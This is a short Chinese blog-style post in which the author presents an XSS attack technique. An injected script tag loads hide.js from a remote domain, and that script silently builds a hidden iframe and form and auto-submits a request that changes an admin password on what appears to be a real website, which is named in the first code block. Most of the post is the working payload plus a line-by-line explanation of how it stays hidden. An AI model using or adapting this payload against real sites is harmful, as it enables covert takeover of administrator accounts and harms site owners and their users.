今日跨站时,懒得写AJAX代码,想到了利用FORM target属性 + iframe来模拟恶意表单提交动作。

    XSS代码:
        <script language='javascript' src='http://www.sswowo.com/hide.js'></script>  
        //恶意注入的XSS代码 引用了远程我们自己编写的JS脚本

    hide.js
        //以下是hide.js脚本的内容:
            document.write('<iframe name="hidden_frame" id="hidden_frame" style="display:none"><\/iframe><form action="http://www.spring-design.cn/admin/Admin_modify.asp?id=1" method="post" enctype="application/x-www-form-urlencoded" name="xss" target="hidden_frame"><input type="hidden" name="modify" value="yes" \/><input type="hidden" name="pass" value="123123" \/><input type="hidden" name="pass1" value="123123" \/><\/form>');
            document.forms['xss'].submit();

    首先我们利用document.write将我们需要用到的代码输出到页面上。下面是代码解释:

    <iframe name="hidden_frame" style="display:none"></iframe>
    //这里写了一个隐藏的 IFRAME,  设置style="display:none" 设置不显示。 还有设置 NAME=“hidden_frame” 在表单的 target属性时需要用到

    <form action="http://www.XXXXX-XXXXXX.cn/admin/Admin_modify.asp?id=1" method="post" enctype="application/x-www-form-urlencoded" name="xss" target="hidden_frame">
    //设置好提交地址,还有一点在于 FORM 的 NAME='XSS'  这里等下我们 用JS自动提交表单时 需要用到 ,主要的是  target="hidden_frame" 设置在 hidden_frame 里执行我们的提交动作。起到隐藏提交作用。
    我们这里设置在 iframe 里面执行提交动作,那么我们本页面就不会刷新,页面也不会被重定向到提交地址,而iframe 我们又设置了不可见。 其实用挂马常用的 宽度高度=0 是一样可以的。
    <input type="hidden" name="modify" value="yes" /> //构造的提交参数和值
    <input type="hidden" name="pass" value="123123" /> //构造的提交参数和值
    <input type="hidden" name="pass1" value="123123" /> //构造的提交参数和值
    </form>

    以上表单的作用是实现提交一个密码修改表单的功能。

    最后:document.forms['xss'].submit(); 提交 NAME=“XSS” 的表单。

    其实谈不上原创, 只是自己想出来的另外一条 小道道。。。

    作为一个菜鸟,我感到很大的鸭梨!!!